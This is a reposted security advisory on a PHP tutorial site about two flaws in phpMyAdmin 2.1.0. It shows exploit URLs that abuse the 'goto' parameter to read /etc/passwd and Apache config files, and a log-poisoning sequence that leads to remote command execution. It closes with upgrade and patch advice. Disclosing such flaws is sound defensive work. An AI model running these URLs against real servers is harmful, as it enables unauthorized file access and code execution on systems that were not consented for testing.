Home > Backend Development > PHP Tutorial > There are two vulnerabilities in phpMyAdmin2.1.0_PHP Tutorial

There are two vulnerabilities in phpMyAdmin2.1.0_PHP Tutorial

WBOY
Release: 2016-07-13 17:09:00
Original
957 people have browsed it

phpMyAdmin ( http://www.phpwizard.net/projects/phpMyAdmin/ ) is a PHP tool for managing MySQL databases, with a WEB-based interface. But it was found to have loopholes. Optionally install the newly released stable version:
phpMyAdmin 2.2.0.
1. Directory traversal vulnerability
The attacker provides the following URL:
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/passwd&btnDrop=No (*)
http://www.example.com/phpMyAdmin/tbl_replace.php?db=test&table=ess&goto=/etc/passwd
Can illegally access system files
The problematic code is:
'include ($goto);' in sql.php and in tbl_replace.php.
2. Attacker code execution vulnerability
By using globally writable log files, an attacker can execute arbitrary code on the affected server.
First, get the Apache configuration file so you know where the log files are stored:
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/httpd.conf&btnDrop=No
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/srm.conf&btnDrop=No
http://www.example.com/phpMyAdmin/sql.php ?goto=/etc/apache/conf/access.conf&btnDrop=No
As you can see, the log is placed at:
/var/log/httpd/error_log
/var/log/httpd/access_log
Then telnet to port 80
# telnet www.example.com 80
Trying xxx.xxx.xxx.xxx...
Connected to www.example.com.
Escape character is '^ ]'.
GET
^]
telnet> quit
Connection closed.
#
After the GET request, the attacker can upload arbitrary PHP code
Now, you can Run the command remotely as Apache user:
http://www.example.com/phpMyAdmin/sql.php?goto=/var/log/httpd/
access_log&btnDrop=No?meters=ls%20- l%20/
Affected systems:
phpMyAdmin 2.1.0
Solution:
Suggestions:
1. Use phpMyAdmin 2.2.0
http://prdownloads.sourceforge. net/phpmyadmin/phpMyAdmin-2.2.0-php.tar.gz
2. Users download and install the patch:
http://www.securereality.com.au/patches/phpMyAdmin-SecureReality.diff
Excerpted from: 52w.net

www.bkjia.comtruehttp: //www.bkjia.com/PHPjc/629808.htmlTechArticlephpMyAdmin ( http://www.phpwizard.net/projects/phpMyAdmin/ ) is a tool for managing MySQL databases PHP tool with WEB-based interface. But it was found to have loopholes. Optional installation...
Related labels:
source:php.cn
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template